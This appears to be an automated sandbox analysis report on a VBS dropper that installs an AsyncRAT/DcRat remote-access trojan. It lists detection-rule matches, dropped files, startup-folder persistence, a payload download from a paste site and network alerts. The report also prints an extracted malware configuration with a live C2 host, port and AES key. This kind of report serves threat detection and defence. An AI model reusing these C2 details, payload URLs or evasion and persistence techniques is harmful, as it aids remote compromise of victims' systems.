11.2.powershell.exe.1d38e3da290.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x15b82:$q1: Select * from Win32_CacheMemory 0x13f012:$q1: Select * from Win32_CacheMemory 0x3ae2ca:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x15bc2:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x13f052:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x3ae30a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x15c10:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x13f0a0:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x3ae358:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x15c5e:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x13f0ee:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x3ae3a6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
11.2.powershell.exe.1d38e3da290.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x15ffa:$s1: DcRatBy 0x13f48a:$s1: DcRatBy 0x3ae742:$s1: DcRatBy
6.2.powershell.exe.2464fbd9680.3.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
6.2.powershell.exe.2464fbd9680.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.powershell.exe.2464fbd9680.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x9a58:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x15a38:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x99a3:$s2: L2Mgc2NodGFza3MgL2 0x15983:$s2: L2Mgc2NodGFza3MgL2 0x9922:$s3: QW1zaVNjYW5CdWZmZXI 0x15902:$s3: QW1zaVNjYW5CdWZmZXI 0x9970:$s4: VmlydHVhbFByb3RlY3Q 0x15950:$s4: VmlydHVhbFByb3RlY3Q
6.2.powershell.exe.2464fbd9680.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9cda:$q1: Select * from Win32_CacheMemory 0x15cba:$q1: Select * from Win32_CacheMemory 0x9d1a:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x15cfa:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9d68:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x15d48:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9db6:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x15d96:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
6.2.powershell.exe.2464fbd9680.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa152:$s1: DcRatBy 0x16132:$s1: DcRatBy
Click to see the 145 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 924, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Snort Signatures

ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) - Source IP: 91.193.75.216 - Destination IP: 192.168.2.6

Timestamp:	91.193.75.216192.168.2.69217497592848152 05/16/22-19:30:11.449233
SID:	2848152
Source Port:	9217
Destination Port:	49759
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Malicious SSL Cert (AsyncRAT) - Source IP: 91.193.75.216 - Destination IP: 192.168.2.6

Timestamp:	91.193.75.216192.168.2.69217497592034847 05/16/22-19:30:11.449233
SID:	2034847
Source Port:	9217
Destination Port:	49759
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: AsyncRAT {"Server": "sky01.publicvm.com", "Ports": "9217", "Version": " 1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "5RESCY68ciiacdgkayNo6rGfK4TKsWv4", "Mutex": "DcRatMutex_qwqdanchun", "AntiDetection": "null", "External_config_on_Pastebin": "false", "BDOS": "1", "Startup_Delay": "Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==", "HWID": "null", "Certificate": "MIICMDCCAZmgAwIBAgIVANDdhyIzFkRkVUdU1pUsWShwjeXTMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIwMTEyNzIxMjU0NVoXDTMxMDkwNjIxMjU0NVowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJAPN6hAAYtlFpprsg+awNYGXe+gvrIVoVQz2ubNjglQKceBMbhrB9fJZfXJkDLol6/a3Jd4JycS51W+zZgLbcjK8rwRyJ+AUI9TJN4ghCPvSgqXiqTzwruPo+z8B41xcddSJ8Iv49ReFpZGNfbzC4AL5U3gWj+Gq+o4Eh1TigrrAgMBAAGjMjAwMB0GA1UdDgQWBBSieJAE4Zd65wRgTOwM9yD2xjDKZjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAH+wbEwYgTSF3NRuSaLbjALT8E5lmhrkkc7l8R7dojnqZqGA6GqIR3B1aERDKeX6YY3msdmw4uK4K7qWXuWRhjn1Zbweea4YrUyTLtTu1OYJpE9z7vVTfXi7Pkl+j9187kZ8f+S+EvFo9aw2YO5jK9UTyZ8dhtQuhpC9sRSCwQ5f", "ServerSignature": "WoklUUd+SGm6e+hGmYIVMdTguE/XnNLwPxGmIOoxt2UjxnKg6OsTdNTB9cmWQ+jVcpyD/M40s29l+GdlklpBRG3mflrHprg7R+Q9GKMdUToU8MO6imLwgYm5Ft0mzcc8W5sb5cqZ4Bg8wPJ907IBJ3Gd0vUUtxJgxLqCP7AFfis=", "Group": "false"}

Multi AV Scanner detection for submitted file

Source: Re-RFQ - PN List.vbs

ReversingLabs: Detection: 12%

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Public\gia9ab2dg0.PS1	Avira: detection malicious, Label: DR/PShell.G2
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs	Avira: detection malicious, Label: VBS/PSRunner.VPAY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll	Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdbXP source: powershell.exe, 00000006.00000002.503794683.000002464FA26000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.pdb@ source: powershell.exe, 00000006.00000002.501027753.000002464F879000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 199.102.48.248 1433			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Domain query: SQL8003.site4now.net

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2034847 ET TROJAN Observed Malicious SSL Cert (AsyncRAT) 91.193.75.216:9217 -> 192.168.2.6:49759
Source: Traffic	Snort IDS: 2848152 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant) 91.193.75.216:9217 -> 192.168.2.6:49759

Yara detected Generic Downloader

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: sky01.publicvm.com

Source: Joe Sandbox View

ASN Name: AS-30083-GO-DADDY-COM-LLCUS AS-30083-GO-DADDY-COM-LLCUS

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic

HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 148.72.177.212 148.72.177.212
Source: Joe Sandbox View	IP Address: 199.102.48.248 199.102.48.248

Source: unknown

HTTPS traffic detected: 148.72.177.212:443 -> 192.168.2.6:49736 version: TLS 1.0

Source: global traffic	TCP traffic: 192.168.2.6:49732 -> 199.102.48.248:1433
Source: global traffic	TCP traffic: 192.168.2.6:49759 -> 91.193.75.216:9217

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.535727725.000001B3CCE70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.510131517.0000024666F8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.538521959.000001D3A68A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.406545482.000001C9E1FDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401534495.000001C9E1FCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab5%
Source: wscript.exe, 00000000.00000003.389995366.000001C9E3EEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6699eb21577f6
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.522337987.000001B3B4A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.491464852.000002464EBD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.530065189.000001D38DE21000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.534601743.000001B3B5C2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.535236565.000001B3C4AA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net
Source: powershell.exe, 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net/raw/gia9ab2dg0
Source: powershell.exe, 00000002.00000002.523386624.000001B3B4C52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://textbin.net/raw/gia9ab2dg00y

Source: unknown

DNS traffic detected: queries for: SQL8003.site4now.net

Source: global traffic

HTTP traffic detected: GET /raw/gia9ab2dg0 HTTP/1.1Host: textbin.netConnection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
